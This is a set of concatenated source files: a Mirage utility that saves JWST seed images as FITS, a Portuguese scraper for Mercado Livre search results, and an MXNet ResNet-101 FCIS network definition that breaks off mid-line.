99.9)*u.percent) map_hmi.plot(axes=ax1, autoalign=True, alpha=0.5) ax1.set_title('HMI overlaid on AIA') plt.show() # sphinx_gallery_thumbnail_number = 2
the-stack_106_24308
#! /usr/bin/env python """ Utility for saving seed images """ import logging import os from astropy.io import fits import numpy as np import mirage from mirage.logging import logging_functions from mirage.utils.constants import LOG_CONFIG_FILENAME, STANDARD_LOGFILE_NAME classdir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../')) log_config_file = os.path.join(classdir, 'logging', LOG_CONFIG_FILENAME) logging_functions.create_logger(log_config_file, STANDARD_LOGFILE_NAME) def save(seed_image, param_file, parameters, photflam, photfnu, pivot_wavelength, fullframe_size, nominal_dimensions, coord_adjust, grism_direct_factor, filename=None, segmentation_map=None, frametime=None, base_unit='ADU'): """Save a seed image """ logger = logging.getLogger('mirage.seed_image.save_seed.save') arrayshape = seed_image.shape if len(arrayshape) == 2: units = '{}/sec'.format(base_unit) yd, xd = arrayshape tgroup = 0. logger.info('Seed image is 2D.') elif len(arrayshape) == 3: units = base_unit g, yd, xd = arrayshape tgroup = frametime * (parameters['Readout']['nframe'] + parameters['Readout']['nskip']) logger.info('Seed image is 3D.') elif len(arrayshape) == 4: units = base_unit integ, g, yd, xd = arrayshape tgroup = frametime * (parameters['Readout']['nframe'] + parameters['Readout']['nskip']) logger.info('Seed image is 4D.') xcent_fov = xd / 2 ycent_fov = yd / 2 kw = {} kw['xcenter'] = xcent_fov kw['ycenter'] = ycent_fov kw['units'] = kw['UNITS'] = units kw['TGROUP'] = tgroup if parameters['Readout']['pupil'][0].upper() == 'F': usefilt = 'pupil' else: usefilt = 'filter' if filename is None: basename = os.path.join(parameters['Output']['directory'], parameters['Output']['file'][0:-5].split('/')[-1]) filename = '{}_{}_seed_image.fits'.format(basename, parameters['Readout'][usefilt]) # Set FGS filter to "N/A" in the output file # as this is the value DMS looks for. if parameters['Readout'][usefilt] == "NA": parameters['Readout'][usefilt] = "N/A" kw['filter'] = parameters['Readout'][usefilt] kw['PHOTFLAM'] = photflam kw['PHOTFNU'] = photfnu kw['PHOTPLAM'] = pivot_wavelength * 1.e4 # put into angstroms kw['NOMXDIM'] = nominal_dimensions[1] kw['NOMYDIM'] = nominal_dimensions[0] kw['NOMXSTRT'] = np.int(coord_adjust['xoffset'] + 1) kw['NOMXEND'] = np.int(nominal_dimensions[1] + coord_adjust['xoffset']) kw['NOMYSTRT'] = np.int(coord_adjust['yoffset'] + 1) kw['NOMYEND'] = np.int(nominal_dimensions[0] + coord_adjust['yoffset']) # Files/inputs used during seed image production kw['YAMLFILE'] = param_file kw['GAINFILE'] = parameters['Reffiles']['gain'] kw['DISTORTN'] = parameters['Reffiles']['astrometric'] kw['IPC'] = parameters['Reffiles']['ipc'] kw['PIXARMAP'] = parameters['Reffiles']['pixelAreaMap'] kw['CROSSTLK'] = parameters['Reffiles']['crosstalk'] kw['FLUX_CAL'] = parameters['Reffiles']['flux_cal'] kw['FTHRUPUT'] = parameters['Reffiles']['filter_throughput'] kw['PTSRCCAT'] = parameters['simSignals']['pointsource'] kw['GALAXCAT'] = parameters['simSignals']['galaxyListFile'] kw['EXTNDCAT'] = parameters['simSignals']['extended'] kw['MTPTSCAT'] = parameters['simSignals']['movingTargetList'] kw['MTSERSIC'] = parameters['simSignals']['movingTargetSersic'] kw['MTEXTEND'] = parameters['simSignals']['movingTargetExtended'] kw['NONSDRAL'] = parameters['simSignals']['movingTargetToTrack'] kw['BKGDRATE'] = parameters['simSignals']['bkgdrate'] kw['TRACKING'] = parameters['Telescope']['tracking'] kw['POISSON'] = parameters['simSignals']['poissonseed'] kw['PSFWFE'] = parameters['simSignals']['psfwfe'] kw['PSFWFGRP'] = parameters['simSignals']['psfwfegroup'] kw['MRGEVRSN'] = mirage.__version__ # Seed images provided to disperser are always embedded in an array # with dimensions equal to full frame * self.grism_direct_factor if parameters['Inst']['mode'] in ['wfss', 'ts_wfss']: kw['NOMXDIM'] = fullframe_size kw['NOMYDIM'] = fullframe_size kw['NOMXSTRT'] = np.int(fullframe_size * (grism_direct_factor - 1) / 2.) kw['NOMXEND'] = kw['NOMXSTRT'] + fullframe_size - 1 kw['NOMYSTRT'] = np.int(fullframe_size * (grism_direct_factor - 1) / 2.) kw['NOMYEND'] = kw['NOMYSTRT'] + fullframe_size - 1 kw['GRISMPAD'] = grism_direct_factor seedinfo = kw save_single_fits(seed_image, filename, key_dict=kw, image2=segmentation_map, image2type='SEGMAP') # Keep this print statement in the code that calls this function #print("Seed image and segmentation map saved as {}".format(self.seed_file)) #print("Seed image, segmentation map, and metadata available as:") #print("self.seedimage, self.seed_segmap, self.seedinfo.") return filename, seedinfo def save_single_fits(image, name, key_dict=None, image2=None, image2type=None): # Save an array into the first extension of a fits file h0 = fits.PrimaryHDU() h1 = fits.ImageHDU(image, name='DATA') if image2 is not None: h2 = fits.ImageHDU(image2) if image2type is not None: h2.header['EXTNAME'] = image2type # if a keyword dictionary is provided, put the # keywords into the 0th and 1st extension headers if key_dict is not None: for key in key_dict: h0.header[key] = key_dict[key] h1.header[key] = key_dict[key] if image2 is None: hdulist = fits.HDUList([h0, h1]) else: hdulist = fits.HDUList([h0, h1, h2]) hdulist.writeto(name, overwrite=True)
the-stack_106_24309
from bs4 import BeautifulSoup import requests import sys def pega_items(caixa_produto): # para cada div produto achado ele faz isso: for produtos_achados in caixa_produto: # aqui pega os atributos desejados dos seguintes items produto_descricao = produtos_achados.find('h2', class_='ui-search-item__title') produto_preco = produtos_achados.find('span', class_='price-tag-fraction') produto_url = produtos_achados.find('a', class_="ui-search-item__group__element ui-search-link")['href'] # daqui até o final da funcão verifica se o objeto existe e contem texto, se sim ele é printado, se não, é ignorado if(produto_descricao and produto_descricao.text != ""): print(f'\nDescrição: {produto_descricao.text}') if(produto_preco and produto_preco.text != ""): print(f'Preço: R${produto_preco.text},00') if(produto_url and produto_url != ""): print(f'Url: {produto_url}') def pega_numero_paginas(): while True: try: numero_paginas = int(input('Quantas páginas de resultado deseja visualizar? ')) # pergunta o numero de paginas, return numero_paginas # se conseguir ele retorna e quebra o loop, break # se não só ignora except: pass num_paginas = pega_numero_paginas() if(num_paginas > 40): # se o numero de páginas for maior que 40, que é o máximo mostrado pelo mercado livre, num_paginas = 40 # ele simplesmente seta o valor pra 40 mesmo nome_produto = str(input('Digite o número do produto desejado: ')) # pergunta o nome do produto e converte para string url = f'https://lista.mercadolivre.com.br/{nome_produto}' # pega a url com o nome de produto # faz um loop para pegar todas as páginas que o usuario deseja for i in range(0,num_paginas): site_html = requests.get(url) #pega o html da pagina site_bs4 = BeautifulSoup(site_html.text, 'html.parser') # transforma o html da pagina num formato aceito pelo beautiful soup caixa_produto = site_bs4.findAll('div', class_='ui-search-result__content-wrapper') # pega os produtos e armazenam numa lista print(f'\n\nPágina n {i+1}:') # printa o número da página para melhor entendimento pega_items(caixa_produto) # chama a função pega_items passando como parametro a lista de produtos anteriormente mencionada: caixa_produto try: url = site_bs4.find('a', class_='andes-pagination__link ui-search-link')['href'] # ele vai tentar pegar a próxima url, se conseguir pega except: sys.exit() # se não, ele fecha a aplicação, porque provavelmente ele fechou por não ter mais páginas de resultado #get_item()
the-stack_106_24312
# -------------------------------------------------------- # Fully Convolutional Instance-aware Semantic Segmentation # Copyright (c) 2017 Microsoft # Licensed under The MIT License [see LICENSE for details] # Written by Haozhi Qi, Guodong Zhang, Yi Li # -------------------------------------------------------- import pickle as cPickle import mxnet as mx from utils.symbol import Symbol from operator_py.proposal import * from operator_py.proposal_annotator import * from operator_py.box_parser import * from operator_py.box_annotator_ohem import * class resnet_v1_101_fcis(Symbol): def __init__(self): """ Use __init__ to define parameter network needs """ self.eps = 1e-5 self.use_global_stats = True self.workspace = 512 self.units = (3, 4, 23, 3) # use for 101 self.filter_list = [256, 512, 1024, 2048] def get_resnet_v1_conv4(self, data): conv1 = mx.symbol.Convolution(name='conv1', data=data, num_filter=64, pad=(3, 3), kernel=(7, 7), stride=(2, 2), no_bias=True) bn_conv1 = mx.symbol.BatchNorm(name='bn_conv1', data=conv1, use_global_stats=True, fix_gamma=False, eps=self.eps) scale_conv1 = bn_conv1 conv1_relu = mx.symbol.Activation(name='conv1_relu', data=scale_conv1, act_type='relu') pool1 = mx.symbol.Pooling(name='pool1', data=conv1_relu, pooling_convention='full', pad=(0, 0), kernel=(3, 3), stride=(2, 2), pool_type='max') res2a_branch1 = mx.symbol.Convolution(name='res2a_branch1', data=pool1, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2a_branch1 = mx.symbol.BatchNorm(name='bn2a_branch1', data=res2a_branch1, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2a_branch1 = bn2a_branch1 res2a_branch2a = mx.symbol.Convolution(name='res2a_branch2a', data=pool1, num_filter=64, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2a_branch2a = mx.symbol.BatchNorm(name='bn2a_branch2a', data=res2a_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2a_branch2a = bn2a_branch2a res2a_branch2a_relu = mx.symbol.Activation(name='res2a_branch2a_relu', data=scale2a_branch2a, act_type='relu') res2a_branch2b = mx.symbol.Convolution(name='res2a_branch2b', data=res2a_branch2a_relu, num_filter=64, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn2a_branch2b = mx.symbol.BatchNorm(name='bn2a_branch2b', data=res2a_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2a_branch2b = bn2a_branch2b res2a_branch2b_relu = mx.symbol.Activation(name='res2a_branch2b_relu', data=scale2a_branch2b, act_type='relu') res2a_branch2c = mx.symbol.Convolution(name='res2a_branch2c', data=res2a_branch2b_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2a_branch2c = mx.symbol.BatchNorm(name='bn2a_branch2c', data=res2a_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2a_branch2c = bn2a_branch2c res2a = mx.symbol.broadcast_add(name='res2a', *[scale2a_branch1, scale2a_branch2c]) res2a_relu = mx.symbol.Activation(name='res2a_relu', data=res2a, act_type='relu') res2b_branch2a = mx.symbol.Convolution(name='res2b_branch2a', data=res2a_relu, num_filter=64, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2b_branch2a = mx.symbol.BatchNorm(name='bn2b_branch2a', data=res2b_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2b_branch2a = bn2b_branch2a res2b_branch2a_relu = mx.symbol.Activation(name='res2b_branch2a_relu', data=scale2b_branch2a, act_type='relu') res2b_branch2b = mx.symbol.Convolution(name='res2b_branch2b', data=res2b_branch2a_relu, num_filter=64, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn2b_branch2b = mx.symbol.BatchNorm(name='bn2b_branch2b', data=res2b_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2b_branch2b = bn2b_branch2b res2b_branch2b_relu = mx.symbol.Activation(name='res2b_branch2b_relu', data=scale2b_branch2b, act_type='relu') res2b_branch2c = mx.symbol.Convolution(name='res2b_branch2c', data=res2b_branch2b_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2b_branch2c = mx.symbol.BatchNorm(name='bn2b_branch2c', data=res2b_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2b_branch2c = bn2b_branch2c res2b = mx.symbol.broadcast_add(name='res2b', *[res2a_relu, scale2b_branch2c]) res2b_relu = mx.symbol.Activation(name='res2b_relu', data=res2b, act_type='relu') res2c_branch2a = mx.symbol.Convolution(name='res2c_branch2a', data=res2b_relu, num_filter=64, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2c_branch2a = mx.symbol.BatchNorm(name='bn2c_branch2a', data=res2c_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2c_branch2a = bn2c_branch2a res2c_branch2a_relu = mx.symbol.Activation(name='res2c_branch2a_relu', data=scale2c_branch2a, act_type='relu') res2c_branch2b = mx.symbol.Convolution(name='res2c_branch2b', data=res2c_branch2a_relu, num_filter=64, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn2c_branch2b = mx.symbol.BatchNorm(name='bn2c_branch2b', data=res2c_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2c_branch2b = bn2c_branch2b res2c_branch2b_relu = mx.symbol.Activation(name='res2c_branch2b_relu', data=scale2c_branch2b, act_type='relu') res2c_branch2c = mx.symbol.Convolution(name='res2c_branch2c', data=res2c_branch2b_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn2c_branch2c = mx.symbol.BatchNorm(name='bn2c_branch2c', data=res2c_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale2c_branch2c = bn2c_branch2c res2c = mx.symbol.broadcast_add(name='res2c', *[res2b_relu, scale2c_branch2c]) res2c_relu = mx.symbol.Activation(name='res2c_relu', data=res2c, act_type='relu') res3a_branch1 = mx.symbol.Convolution(name='res3a_branch1', data=res2c_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(2, 2), no_bias=True) bn3a_branch1 = mx.symbol.BatchNorm(name='bn3a_branch1', data=res3a_branch1, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3a_branch1 = bn3a_branch1 res3a_branch2a = mx.symbol.Convolution(name='res3a_branch2a', data=res2c_relu, num_filter=128, pad=(0, 0), kernel=(1, 1), stride=(2, 2), no_bias=True) bn3a_branch2a = mx.symbol.BatchNorm(name='bn3a_branch2a', data=res3a_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3a_branch2a = bn3a_branch2a res3a_branch2a_relu = mx.symbol.Activation(name='res3a_branch2a_relu', data=scale3a_branch2a, act_type='relu') res3a_branch2b = mx.symbol.Convolution(name='res3a_branch2b', data=res3a_branch2a_relu, num_filter=128, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn3a_branch2b = mx.symbol.BatchNorm(name='bn3a_branch2b', data=res3a_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3a_branch2b = bn3a_branch2b res3a_branch2b_relu = mx.symbol.Activation(name='res3a_branch2b_relu', data=scale3a_branch2b, act_type='relu') res3a_branch2c = mx.symbol.Convolution(name='res3a_branch2c', data=res3a_branch2b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3a_branch2c = mx.symbol.BatchNorm(name='bn3a_branch2c', data=res3a_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3a_branch2c = bn3a_branch2c res3a = mx.symbol.broadcast_add(name='res3a', *[scale3a_branch1, scale3a_branch2c]) res3a_relu = mx.symbol.Activation(name='res3a_relu', data=res3a, act_type='relu') res3b1_branch2a = mx.symbol.Convolution(name='res3b1_branch2a', data=res3a_relu, num_filter=128, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b1_branch2a = mx.symbol.BatchNorm(name='bn3b1_branch2a', data=res3b1_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b1_branch2a = bn3b1_branch2a res3b1_branch2a_relu = mx.symbol.Activation(name='res3b1_branch2a_relu', data=scale3b1_branch2a, act_type='relu') res3b1_branch2b = mx.symbol.Convolution(name='res3b1_branch2b', data=res3b1_branch2a_relu, num_filter=128, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn3b1_branch2b = mx.symbol.BatchNorm(name='bn3b1_branch2b', data=res3b1_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b1_branch2b = bn3b1_branch2b res3b1_branch2b_relu = mx.symbol.Activation(name='res3b1_branch2b_relu', data=scale3b1_branch2b, act_type='relu') res3b1_branch2c = mx.symbol.Convolution(name='res3b1_branch2c', data=res3b1_branch2b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b1_branch2c = mx.symbol.BatchNorm(name='bn3b1_branch2c', data=res3b1_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b1_branch2c = bn3b1_branch2c res3b1 = mx.symbol.broadcast_add(name='res3b1', *[res3a_relu, scale3b1_branch2c]) res3b1_relu = mx.symbol.Activation(name='res3b1_relu', data=res3b1, act_type='relu') res3b2_branch2a = mx.symbol.Convolution(name='res3b2_branch2a', data=res3b1_relu, num_filter=128, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b2_branch2a = mx.symbol.BatchNorm(name='bn3b2_branch2a', data=res3b2_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b2_branch2a = bn3b2_branch2a res3b2_branch2a_relu = mx.symbol.Activation(name='res3b2_branch2a_relu', data=scale3b2_branch2a, act_type='relu') res3b2_branch2b = mx.symbol.Convolution(name='res3b2_branch2b', data=res3b2_branch2a_relu, num_filter=128, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn3b2_branch2b = mx.symbol.BatchNorm(name='bn3b2_branch2b', data=res3b2_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b2_branch2b = bn3b2_branch2b res3b2_branch2b_relu = mx.symbol.Activation(name='res3b2_branch2b_relu', data=scale3b2_branch2b, act_type='relu') res3b2_branch2c = mx.symbol.Convolution(name='res3b2_branch2c', data=res3b2_branch2b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b2_branch2c = mx.symbol.BatchNorm(name='bn3b2_branch2c', data=res3b2_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b2_branch2c = bn3b2_branch2c res3b2 = mx.symbol.broadcast_add(name='res3b2', *[res3b1_relu, scale3b2_branch2c]) res3b2_relu = mx.symbol.Activation(name='res3b2_relu', data=res3b2, act_type='relu') res3b3_branch2a = mx.symbol.Convolution(name='res3b3_branch2a', data=res3b2_relu, num_filter=128, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b3_branch2a = mx.symbol.BatchNorm(name='bn3b3_branch2a', data=res3b3_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b3_branch2a = bn3b3_branch2a res3b3_branch2a_relu = mx.symbol.Activation(name='res3b3_branch2a_relu', data=scale3b3_branch2a, act_type='relu') res3b3_branch2b = mx.symbol.Convolution(name='res3b3_branch2b', data=res3b3_branch2a_relu, num_filter=128, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn3b3_branch2b = mx.symbol.BatchNorm(name='bn3b3_branch2b', data=res3b3_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b3_branch2b = bn3b3_branch2b res3b3_branch2b_relu = mx.symbol.Activation(name='res3b3_branch2b_relu', data=scale3b3_branch2b, act_type='relu') res3b3_branch2c = mx.symbol.Convolution(name='res3b3_branch2c', data=res3b3_branch2b_relu, num_filter=512, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn3b3_branch2c = mx.symbol.BatchNorm(name='bn3b3_branch2c', data=res3b3_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale3b3_branch2c = bn3b3_branch2c res3b3 = mx.symbol.broadcast_add(name='res3b3', *[res3b2_relu, scale3b3_branch2c]) res3b3_relu = mx.symbol.Activation(name='res3b3_relu', data=res3b3, act_type='relu') res4a_branch1 = mx.symbol.Convolution(name='res4a_branch1', data=res3b3_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(2, 2), no_bias=True) bn4a_branch1 = mx.symbol.BatchNorm(name='bn4a_branch1', data=res4a_branch1, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4a_branch1 = bn4a_branch1 res4a_branch2a = mx.symbol.Convolution(name='res4a_branch2a', data=res3b3_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(2, 2), no_bias=True) bn4a_branch2a = mx.symbol.BatchNorm(name='bn4a_branch2a', data=res4a_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4a_branch2a = bn4a_branch2a res4a_branch2a_relu = mx.symbol.Activation(name='res4a_branch2a_relu', data=scale4a_branch2a, act_type='relu') res4a_branch2b = mx.symbol.Convolution(name='res4a_branch2b', data=res4a_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4a_branch2b = mx.symbol.BatchNorm(name='bn4a_branch2b', data=res4a_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4a_branch2b = bn4a_branch2b res4a_branch2b_relu = mx.symbol.Activation(name='res4a_branch2b_relu', data=scale4a_branch2b, act_type='relu') res4a_branch2c = mx.symbol.Convolution(name='res4a_branch2c', data=res4a_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4a_branch2c = mx.symbol.BatchNorm(name='bn4a_branch2c', data=res4a_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4a_branch2c = bn4a_branch2c res4a = mx.symbol.broadcast_add(name='res4a', *[scale4a_branch1, scale4a_branch2c]) res4a_relu = mx.symbol.Activation(name='res4a_relu', data=res4a, act_type='relu') res4b1_branch2a = mx.symbol.Convolution(name='res4b1_branch2a', data=res4a_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b1_branch2a = mx.symbol.BatchNorm(name='bn4b1_branch2a', data=res4b1_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b1_branch2a = bn4b1_branch2a res4b1_branch2a_relu = mx.symbol.Activation(name='res4b1_branch2a_relu', data=scale4b1_branch2a, act_type='relu') res4b1_branch2b = mx.symbol.Convolution(name='res4b1_branch2b', data=res4b1_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b1_branch2b = mx.symbol.BatchNorm(name='bn4b1_branch2b', data=res4b1_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b1_branch2b = bn4b1_branch2b res4b1_branch2b_relu = mx.symbol.Activation(name='res4b1_branch2b_relu', data=scale4b1_branch2b, act_type='relu') res4b1_branch2c = mx.symbol.Convolution(name='res4b1_branch2c', data=res4b1_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b1_branch2c = mx.symbol.BatchNorm(name='bn4b1_branch2c', data=res4b1_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b1_branch2c = bn4b1_branch2c res4b1 = mx.symbol.broadcast_add(name='res4b1', *[res4a_relu, scale4b1_branch2c]) res4b1_relu = mx.symbol.Activation(name='res4b1_relu', data=res4b1, act_type='relu') res4b2_branch2a = mx.symbol.Convolution(name='res4b2_branch2a', data=res4b1_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b2_branch2a = mx.symbol.BatchNorm(name='bn4b2_branch2a', data=res4b2_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b2_branch2a = bn4b2_branch2a res4b2_branch2a_relu = mx.symbol.Activation(name='res4b2_branch2a_relu', data=scale4b2_branch2a, act_type='relu') res4b2_branch2b = mx.symbol.Convolution(name='res4b2_branch2b', data=res4b2_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b2_branch2b = mx.symbol.BatchNorm(name='bn4b2_branch2b', data=res4b2_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b2_branch2b = bn4b2_branch2b res4b2_branch2b_relu = mx.symbol.Activation(name='res4b2_branch2b_relu', data=scale4b2_branch2b, act_type='relu') res4b2_branch2c = mx.symbol.Convolution(name='res4b2_branch2c', data=res4b2_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b2_branch2c = mx.symbol.BatchNorm(name='bn4b2_branch2c', data=res4b2_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b2_branch2c = bn4b2_branch2c res4b2 = mx.symbol.broadcast_add(name='res4b2', *[res4b1_relu, scale4b2_branch2c]) res4b2_relu = mx.symbol.Activation(name='res4b2_relu', data=res4b2, act_type='relu') res4b3_branch2a = mx.symbol.Convolution(name='res4b3_branch2a', data=res4b2_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b3_branch2a = mx.symbol.BatchNorm(name='bn4b3_branch2a', data=res4b3_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b3_branch2a = bn4b3_branch2a res4b3_branch2a_relu = mx.symbol.Activation(name='res4b3_branch2a_relu', data=scale4b3_branch2a, act_type='relu') res4b3_branch2b = mx.symbol.Convolution(name='res4b3_branch2b', data=res4b3_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b3_branch2b = mx.symbol.BatchNorm(name='bn4b3_branch2b', data=res4b3_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b3_branch2b = bn4b3_branch2b res4b3_branch2b_relu = mx.symbol.Activation(name='res4b3_branch2b_relu', data=scale4b3_branch2b, act_type='relu') res4b3_branch2c = mx.symbol.Convolution(name='res4b3_branch2c', data=res4b3_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b3_branch2c = mx.symbol.BatchNorm(name='bn4b3_branch2c', data=res4b3_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b3_branch2c = bn4b3_branch2c res4b3 = mx.symbol.broadcast_add(name='res4b3', *[res4b2_relu, scale4b3_branch2c]) res4b3_relu = mx.symbol.Activation(name='res4b3_relu', data=res4b3, act_type='relu') res4b4_branch2a = mx.symbol.Convolution(name='res4b4_branch2a', data=res4b3_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b4_branch2a = mx.symbol.BatchNorm(name='bn4b4_branch2a', data=res4b4_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b4_branch2a = bn4b4_branch2a res4b4_branch2a_relu = mx.symbol.Activation(name='res4b4_branch2a_relu', data=scale4b4_branch2a, act_type='relu') res4b4_branch2b = mx.symbol.Convolution(name='res4b4_branch2b', data=res4b4_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b4_branch2b = mx.symbol.BatchNorm(name='bn4b4_branch2b', data=res4b4_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b4_branch2b = bn4b4_branch2b res4b4_branch2b_relu = mx.symbol.Activation(name='res4b4_branch2b_relu', data=scale4b4_branch2b, act_type='relu') res4b4_branch2c = mx.symbol.Convolution(name='res4b4_branch2c', data=res4b4_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b4_branch2c = mx.symbol.BatchNorm(name='bn4b4_branch2c', data=res4b4_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b4_branch2c = bn4b4_branch2c res4b4 = mx.symbol.broadcast_add(name='res4b4', *[res4b3_relu, scale4b4_branch2c]) res4b4_relu = mx.symbol.Activation(name='res4b4_relu', data=res4b4, act_type='relu') res4b5_branch2a = mx.symbol.Convolution(name='res4b5_branch2a', data=res4b4_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b5_branch2a = mx.symbol.BatchNorm(name='bn4b5_branch2a', data=res4b5_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b5_branch2a = bn4b5_branch2a res4b5_branch2a_relu = mx.symbol.Activation(name='res4b5_branch2a_relu', data=scale4b5_branch2a, act_type='relu') res4b5_branch2b = mx.symbol.Convolution(name='res4b5_branch2b', data=res4b5_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b5_branch2b = mx.symbol.BatchNorm(name='bn4b5_branch2b', data=res4b5_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b5_branch2b = bn4b5_branch2b res4b5_branch2b_relu = mx.symbol.Activation(name='res4b5_branch2b_relu', data=scale4b5_branch2b, act_type='relu') res4b5_branch2c = mx.symbol.Convolution(name='res4b5_branch2c', data=res4b5_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b5_branch2c = mx.symbol.BatchNorm(name='bn4b5_branch2c', data=res4b5_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b5_branch2c = bn4b5_branch2c res4b5 = mx.symbol.broadcast_add(name='res4b5', *[res4b4_relu, scale4b5_branch2c]) res4b5_relu = mx.symbol.Activation(name='res4b5_relu', data=res4b5, act_type='relu') res4b6_branch2a = mx.symbol.Convolution(name='res4b6_branch2a', data=res4b5_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b6_branch2a = mx.symbol.BatchNorm(name='bn4b6_branch2a', data=res4b6_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b6_branch2a = bn4b6_branch2a res4b6_branch2a_relu = mx.symbol.Activation(name='res4b6_branch2a_relu', data=scale4b6_branch2a, act_type='relu') res4b6_branch2b = mx.symbol.Convolution(name='res4b6_branch2b', data=res4b6_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b6_branch2b = mx.symbol.BatchNorm(name='bn4b6_branch2b', data=res4b6_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b6_branch2b = 